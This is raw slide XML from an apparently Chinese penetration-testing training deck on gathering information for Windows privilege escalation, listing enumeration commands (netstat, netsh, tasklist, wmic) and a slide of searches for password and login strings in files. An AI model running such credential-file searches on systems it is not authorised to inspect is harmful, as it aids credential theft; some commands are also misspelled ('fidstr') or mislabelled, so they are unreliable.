              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看网络连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> firewall show config/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> firewall show config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看防火墙</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED46179-CB95-4B5B-B101-46C282AD0659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1514495" y="3538664"/>
            <a:ext cx="9163010" cy="3155687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1962750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220959" y="742260"/>
            <a:ext cx="9688029" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>6.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用程序和服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /SVC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看服务的进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	DRIVERQUERY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看已安装驱动程序的列表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	net stat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看已启动的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> qc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>TremService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看某服务的启动权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	wmic product list brief </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看已安装程序的列表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	wmic product list brief </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看服务列表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	wmic process list brief </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看进程列表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	wmic startup list brief </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看启动程序列表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F0B21B-BFCA-4A36-902F-9151BA0289D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277672" y="4077478"/>
            <a:ext cx="9250054" cy="2780522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411894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06D24-CF3A-4E1E-9315-0E6AE675B841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="157485"/>
            <a:ext cx="10081120" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914377"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一、提权信息收集</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>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794B3844-8E2F-4F7C-8D6E-9C707B245CAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="220959" y="742260"/>
            <a:ext cx="9688029" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>7.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>检索敏感文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /b /s password.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /b /s *.doc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /b /s *.ppt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /b /s *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /b /s *.docx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /b /s *.xlsx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /b /s config.* filesystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>fidstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> password *.xml *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> *.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>fidstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> login *.xml *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> *.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09DEFCF-9817-4B84-8FFE-2F12615C5453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="924792" y="4782284"/>
            <a:ext cx="10874471" cy="1364801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22299170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1956</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>516</Paragraphs>
  <Slides>67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67</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="74" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>方正姚体</vt:lpstr>
      <vt:lpstr>黑体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Costanzo Sirius</dc:creator>
  <cp:lastModifiedBy>Costanzo Sirius</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-01T11:32:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-02T15:44:41Z</dcterms:modified>
</cp:coreProperties>
</file>